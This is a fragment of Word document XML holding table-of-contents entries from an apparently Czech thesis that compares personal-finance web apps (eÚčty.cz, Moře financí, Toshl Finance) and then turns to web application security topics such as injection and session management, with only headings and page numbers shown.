            <w:smallCaps w:val="0"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>eÚčty.cz</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc387327794 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>19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795" w:history="1">
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>3.1.1</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>Evidence transakcí</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc387327795 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>19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796" w:history="1">
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>3.1.2</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>Statistiky a plánování</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc387327796 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>20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797" w:history="1">
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>3.1.3</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>Zabezpečení a zálohování</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc387327797 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>20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798" w:history="1">
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>3.1.4</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>Další funkce</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc387327798 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>20</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799" w:history="1">
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>3.2</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:smallCaps w:val="0"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>Moře financí</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc387327799 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>21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0" w:history="1">
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>3.2.1</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>Evidence transakcí</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc387327800 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>21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1" w:history="1">
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>3.2.2</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>Statistiky a plánování</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc387327801 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>22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2" w:history="1">
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>3.2.3</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>Zabezpečení a zálohování</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc387327802 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>22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3" w:history="1">
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>3.2.4</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>Další funkce</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc387327803 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>22</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04" w:history="1">
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>3.3</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:smallCaps w:val="0"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>Toshl Finance</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc387327804 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>22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5" w:history="1">
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>3.3.1</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>Evidence transakcí</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc387327805 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>23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6" w:history="1">
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>3.3.2</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>Statistiky a plánování</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc387327806 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>23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7" w:history="1">
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>3.3.3</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>Zabezpečení a zálohování</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc387327807 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>24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08" w:history="1">
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>3.3.4</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>Další funkce</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc387327808 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>24</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09" w:history="1">
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>3.4</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:smallCaps w:val="0"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>Shrnutí</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc387327809 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>24</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810" w:history="1">
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>4</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:b w:val="0"/>
            <w:caps w:val="0"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>Zabezpečení webových aplikací</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc387327810 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>25</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11" w:history="1">
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>4.1</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:smallCaps w:val="0"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>Injection</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc387327811 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>25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2" w:history="1">
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>4.1.1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_Toc387327812 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>25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3" w:history="1">
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>4.1.2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_Toc387327813 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>26</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14" w:history="1">
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>4.2</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:smallCaps w:val="0"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>Zranitelná autentizace nebo správa relace</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc387327814 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>26</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5" w:history="1">
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>4.2.1</w:t>
        </w:r>
